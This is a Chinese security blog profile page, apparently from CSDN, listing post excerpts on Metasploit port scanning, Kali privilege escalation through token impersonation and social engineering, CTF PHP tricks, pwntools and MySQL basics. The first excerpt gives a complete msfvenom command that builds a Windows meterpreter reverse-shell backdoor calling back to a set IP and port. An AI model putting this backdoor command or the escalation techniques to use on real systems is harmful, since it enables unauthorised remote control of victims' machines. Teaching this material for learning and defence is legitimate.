- 博客(10)
- 资源 (43)
- 收藏
- 关注
RSS订阅
转载 多种后门生成
多种后门生成windows -->使用模块“windows/meterpreter/reverse_tcp”命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=44444 X >test.exe参考我的远程控制软件”linux -->使用模块“linux/x86/...
2019-09-06 10:14:41
483
原创 SMB 获取系统信息与SSH与FTP服务识别
SMB 获取系统信息与SSH与FTP服务识别****我们可以通过smb_version来查看哪些IP开启了445,然后我们就可以通过445获取系统信息最后设置参数,扫描出结果SSH与FTP服务识别SH–>安全外壳协议,应用于Linux、AIX、Solaris、Digital UNIX、Irix等操作系统也是可以使用ssh_servion检查是否有网段存在ssh服务开启设置参...
2019-09-06 10:06:06
288
原创 使用msfconsole实现网段端口扫描
msfconsole实现网段端口扫描在nmap中可以直接使用nmap,例如:扫描完整端口、服务及版本使用portscan模块进行局域网IP搜索使用use命令进行syn扫描然后我们可以使用showo ptions显示相关需要配置的信息注:在Required中显示no的才是我们需要设置的信息,其他yes的是可以不用设置的,当然,你看得懂设置也行下面进行set赋值扫描结果Ct...
2019-09-06 09:58:21
2555
转载 CTF-PHP常见考点实例小结
CTF-PHP常见考点实例小结0x00 CTF-PHP常见考点1.php弱类型的比较2.php断言问题3.php读取文件问题4.updatexml(),__wakeup ,preg_match等函数考点5.sha1()函数与md5()知识点6.异或注入绕过考点7.源文件泄露8.extract变量覆盖9.strcmp漏洞…10.RCE的命令执行绕过考点总结的不是很全面,一些常见的考点,希望师傅们多多指点看到网上不少师傅的总结,感觉不错值得学习。下面取几个考点类型案例分析帮助理解,实
2021-11-18 17:05:31
386
转载 2021-11-10
一步一步学pwntools刚刚注册看雪,就来水一篇文章。本来想发发我之前CTF的writeups,不过数量有点多,而且网上也有很多质量不错的wp,就发回之前写的pwntools新手教程。网上纯新手教程比较少,一般都是直接调用api,这篇主要是想给新手对pwntool一个更整体的认识。原文是我用英文写的,如果翻译的不好,请见谅。英语原文:http://www.auxy.xyz/tutorial/2018/09/01/Pwntools-Step-By-Step.html下面开始正文:**序pwn
2021-11-10 15:10:40
131
原创 华罗学安全公众号各笔记
华罗学安全公众号各笔记公众号目前的笔记有(包括待期)如下kali渗透技术详解MySQL从入门到精通wireshark数据包分析实战详解网络攻防案例教程零基础学python(待期)详情请回复关键字wireshark、kali、python、MySQL、网络攻防图片kali渗透技术详解本书由浅入深地介绍了Kali Linux的各种渗透测试技术。书中选取了最核心和最基础的内容进行讲解,让读者能够掌握渗透测试的流程,而不会被高难度的内容所淹没。本书涉及面广,从基本的知识介绍、安装及配置Kali
2021-05-16 18:02:30
110
原创 MySQL数据库操作详解
MySQL数据库操作详解创建数据库create databases u1; 创建u1数据库create table uu1(id int(11)not null key,user varchar(23)not null,passwd varchar(23)not null); ##创建uu1表,限制输入id值为数值型,大小为11字节,且将其设置为主键。再创建user和passwd字段,输入类型不限,大小为23字节desc uu1; #查看uu1表的字段类型insert into uu1(id,u
2021-04-16 17:57:30
100
原创 kali入侵权限提升
权限提升是指将原来的最低权限提高到最高权限,而这个可以使用假冒令牌,本地权限提升和社会工程学等方式实现。本章将介绍其中的各种方法使用假冒令牌本地权限提升攻击使用社会工程学工具包(set)使用set实施攻击使用假冒令牌假冒令牌就是通过假冒管理员的权限进行计算机的各种操作。工作机制简单来说就算用户端向认证服务器申请了认证之后再向服务器申请了密钥,然后攻击者直接攻击服务器获取密钥从而假冒管理员使用假冒令牌首先攻击一台靶机获取meterpreter shell会话加载模块。然后查看帮助信息
2020-12-31 20:45:17
1966
原创 kali的基本安装与使用配置
将kail安装至硬盘Kail linux的下载地址http://www.kail.org/downloads下载到DVD或者是U盘中之后就可以进入boos里面讲启动模式切换为u盘启动,进而进行安装安装至USB驱动器首先需要有一个不低于8GB的U盘,然后进入kail官网下载ISO,启动工具win32 Disk Imager工具,将ISO文件放在USB驱动器上。再使用UNetbootin工具将设备做成一个USB启动器,选择完之后重启即可安装至树莓派从http://www.offensive-secur
2020-12-31 20:35:13
1166
原创 MySQL数据库的基本操作流畅版
MySQL数据库的基本操作流畅版show databases;查看本地数据库2. create database oo;创建名为oo的数据库use oo;指定数据库oo(指定了数据库在可以在接下来进行写入)3. create table uu(id varchar(30) not null key, user varchar(30) not null, passwd varchar(30));创建表,并设置内容行id,user,passwd,其中id设置为主键,其余设置为不允许为空值d
2020-12-31 20:18:08
107
1
mstsc突破连接限制
2018-12-14
web扫flag的python文件
2018-12-14
Ethereal使用方法
2018-12-12
Web日志安全分析工具
2018-12-12
ASPack加壳工具
2018-12-11
网络攻防案例(上半部)
2018-12-13
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人